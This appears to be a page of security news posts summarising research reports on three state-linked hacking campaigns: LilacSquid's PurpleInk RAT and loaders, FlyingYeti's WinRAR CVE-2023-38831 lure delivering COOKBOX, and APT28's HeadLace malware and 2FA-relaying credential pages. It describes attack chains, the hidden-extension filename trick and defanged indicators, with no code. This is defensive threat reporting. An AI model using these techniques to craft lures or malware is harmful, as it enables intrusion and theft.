“As adversaries continue to evolve their tactics and techniques, it is imperative for organizations to remain vigilant and adaptive in defending against cyber threats. By understanding and countering their new adversary behaviors, we can bolster our defenses and safeguard critical assets against future intrusions.” MITRE concludes.

LilacSquid APT targeted organizations in the U.S., Europe, and Asia since at least 2021

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

A previously undocumented APT group tracked as LilacSquid targeted organizations in the U.S., Europe, and Asia since at least 2021.

Cisco Talos researchers reported that a previously undocumented APT group, tracked as LilacSquid, conducted a data theft campaign since at least 2021.

The attacks targeted entities in multiple industries, including organizations in information technology and industrial sectors in the United States, organizations in the energy sector in Europe, and the pharmaceutical sector in Asia.

Threat actors were observed using the open-source remote management tool MeshAgent and a customized version of QuasarRAT malware tracked by Talos as PurpleInk.

PurpleInk is the primary implant in post-exploitation activity in attacks aimed at vulnerable application servers.

The attackers exploited vulnerabilities in Internet-facing application servers and compromised remote desktop protocol (RDP) credentials to deploy a variety of open-source tools, including MeshAgent and Secure Socket Funneling (SSF), alongside customized malware, such as “PurpleInk,” and “InkBox” and “InkLoader loaders.” The Secure Socket Funneling (SSF) tool allows attackers to proxy and tunnel multiple sockets through a secure TLS tunnel.

The threat actors aim to establish long-term access to compromised victims’ organizations to steal sensitive data.

The researchers pointed out that LilacSquid’s tactics, techniques, and procedures (TTPs) overlap with North Korea-linked APT groups such as Andariel and Lazarus. The Andariel APT group has been reported using MeshAgent for post-compromise access, while Lazarus extensively uses SOCKs proxy and tunneling tools along with custom malware to maintain persistence and data exfiltration. LilacSquid similarly uses SSF and other malware to create tunnels to their remote servers.

InkLoader is .NET-based loader designed to run a hardcoded executable or command. It supports persistence mechanism and was spotted deploying PurpleInk.

LilacSquid uses InkLoader in conjunction with PurpleInk when they can create and maintain remote desktop (RDP) sessions using stolen credentials. After a successful RDP login, attackers downloaded InkLoader and PurpleInk, copied to specific directories, and InkLoader is registered as a service. The service is used to launch the InkLoader, which in turn deploys PurpleInk.

PurpleInk is actively developed since 2021, it relies on a configuration file to obtain information such as the command and control (C2) server’s address and port, which is typically base64-decoded and decrypted.

PurpleInk is heavily obfuscated and versatile, the malware supports multiple RAT capabilities including:

Enumerating processes and sending details to the C2.
Terminating specified processes.
Running new applications.
Gathering drive information.
Enumerating directories and obtaining file details.
Reading and exfiltrating specified files.
Replacing or appending content to specified files.

Talos also observed the APT using a custom tool called InkBox to deploy PurpleInk prior to InkLoader.

“InkBox is a malware loader that will read from a hardcoded file path on disk and decrypt its contents. The decrypted content is another executable assembly that is then run by invoking its Entry Point within the InkBox process.” reads the analysis published by Talos.

The researchers provided Indicators of Compromise (IOCs) for the above threats on GitHub.

FlyingYeti targets Ukraine using WinRAR exploit to deliver COOKBOX Malware

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

Russia-linked threat actor FlyingYeti is targeting Ukraine with a phishing campaign to deliver the PowerShell malware COOKBOX.

Cloudflare researchers discovered phishing campaign conducted by a Russia-linked threat actor FlyingYeti (aka UAC-0149) targeting Ukraine. The experts published a report to describe real-time effort to disrupt and delay this threat activity.

At the beginning of Russia’s invasion of Ukraine on February 24, 2022, Ukraine implemented a moratorium on evictions and termination of utility services for unpaid debt. The moratorium ended in January 2024, leading to significant debt liability and increased financial stress for Ukrainian citizens. The FlyingYeti campaign exploited this anxiety by using debt-themed lures to trick targets into opening malicious links embedded in the messages. Upon opening the files, the PowerShell malware COOKBOX infects the target system, allowing the attackers to deploy additional payloads and gain control over the victim’s system.

The threat actors exploited the WinRAR vulnerability CVE-2023-38831 to infect targets with malware.

Cloudflare states that FlyingYeti’s tactics, techniques, and procedures (TTPs) are similar to the ones detailed by Ukraine CERT while analyzing UAC-0149 cluster.

UAC-0149 targeted Ukrainian defense entities with COOKBOX malware since at least the fall of 2023.

“The threat actor uses dynamic DNS (DDNS) for their infrastructure and leverages cloud-based platforms for hosting malicious content and for malware command and control (C2).” reads the report published by Cloudflare. “Our investigation of FlyingYeti TTPs suggests this is likely a Russia-aligned threat group. The actor appears to primarily focus on targeting Ukrainian military entities.”

Threat actors targeted users with a spoofed version of the Kyiv Komunalka communal housing site (https://www.komunalka.ua), hosted on an actor-controlled GitHub page (hxxps[:]//komunalka[.]github[.]io). Komunalka is a payment processor for utilities and other services in the Kyiv region.

FlyingYeti likely directed targets to this page via phishing emails or encrypted Signal messages. On the spoofed site, a large green button prompted users to download a document named “Рахунок.docx” (“Invoice.docx”), which instead downloaded a malicious archive titled “Заборгованість по ЖКП.rar” (“Debt for housing and utility services.rar”).

Once the RAR file is opened, the CVE-2023-38831 exploit triggers the execution of the COOKBOX malware.

The RAR archive contains multiple files, including one with the Unicode character “U+201F,” which appears as whitespace on Windows systems. This character can hide file extensions by adding excessive whitespace, making a malicious CMD file (“Рахунок на оплату.pdf[unicode character U+201F].cmd”) look like a PDF document. The archive also includes a benign PDF with the same name minus the Unicode character. Upon opening the archive, the directory name also matches the benign PDF name. This naming overlap exploits the WinRAR vulnerability CVE-2023-38831, causing the malicious CMD to execute when the target attempts to open the benign PDF.

“The CMD file contains the Flying Yeti PowerShell malware known as COOKBOX. The malware is designed to persist on a host, serving as a foothold in the infected device. Once installed, this variant of COOKBOX will make requests to the DDNS domain postdock[.]serveftp[.]com for C2, awaiting PowerShell cmdlets that the malware will subsequently run.” continues the report. “Alongside COOKBOX, several decoy documents are opened, which contain hidden tracking links using the Canary Tokens service.”

The report also provide recommendations and Indicators of Compromise (IoCs).

APT28 targets key networks in Europe with HeadLace malware

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

Russia-linked APT28 used the HeadLace malware and credential-harvesting web pages in attacks against networks across Europe.

Researchers at Insikt Group observed Russian GRU’s unit APT28 targeting networks across Europe with information-stealer Headlace and credential-harvesting web pages. The experts observed the APT deploying Headlace in three distinct phases from April to December 2023, respectively, using phishing, compromised internet services, and living off the land binaries. The credential harvesting pages were designed to target Ukraine’s Ministry of Defence, European transportation infrastructures, and an Azerbaijani think tank. The credential harvesting pages created by the group can defeat two-factor authentication and CAPTCHA challenges by relaying requests between legitimate services and compromised Ubiquiti routers.

In some attackers, threat actors created specially-crafted web pages on Mocky that interact with a Python script running on compromised Ubiquiti routers to exfiltrate the provided credentials.

The compromise of networks associated with Ukraine’s Ministry of Defence and European railway systems could allow attackers to gather intelligence to influence battlefield tactics and broader military strategies. Additionally, their interest in the Azerbaijan Center for Economic and Social Development indicates a potential agenda to understand and possibly influence regional policies.

Insikt Group speculates the operation is aimed at influencing regional and military dynamics.

The group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).

The attack chain used in the attacks detailed by Insikt Group has seven distinct infrastructure stages to filter out sandboxes, incompatible operating systems, and non-targeted countries. Victims who failed these checks downloaded a benign file and were redirected to Microsoft’s web portal, msn.com. Those who passed the checks downloaded a malicious Windows BAT script, which connected to a free API service to execute successive shell commands.

In December 2023, researchers from Proofpoint and IBM detailed a new wave of APT spear-phishing attacks relying on multiple lure content to deliver Headlace malware. The campaigns targeted at least thirteen separate nations.

“Upon analyzing Headlace geofencing scripts and countries targeted by credential harvesting campaigns from 2022 onwards, Insikt Group identified that thirteen separate countries were targeted by BlueDelta. As expected, Ukraine topped the list, accounting for 40% of the activity.” reads the report published by the Insikt Group. “Türkiye might seem like an unexpected target with 10%, but it’s important to note that it was singled out only by Headlace geofencing, unlike Ukraine, Poland, and Azerbaijan, which were targeted through both Headlace geofencing and credential harvesting.”

Researchers call on organizations within government, military, defense, and related sectors, to bolster cybersecurity measures: prioritizing the detection of sophisticated phishing attempts, restricting access to non-essential internet services, and enhancing surveillance of critical network infrastructure.